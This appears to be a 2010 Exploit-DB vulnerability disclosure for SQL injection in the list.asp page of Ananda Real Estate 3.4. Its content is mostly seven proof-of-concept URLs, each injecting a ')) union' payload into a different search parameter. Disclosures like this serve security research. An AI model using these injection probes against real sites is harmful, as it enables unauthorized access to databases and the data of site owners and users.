Ananda Real Estate 3.4 list.asp Multiple SQL Injection

2010-12-02T00:00:00
ID EDB-ID:15661
Type exploitdb
Reporter underground-stockholm.com
Modified 2010-12-02T00:00:00

Description

Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection. CVE-2006-6807,CVE-2010-4782. Webapps exploit for asp platform

                                        
                                            TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

BUGS:

http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=%27%29%29+union+insect&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=%27%29%29+union+insect&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=&bath=%27%29%29+union+insect&Submit=Search+Now!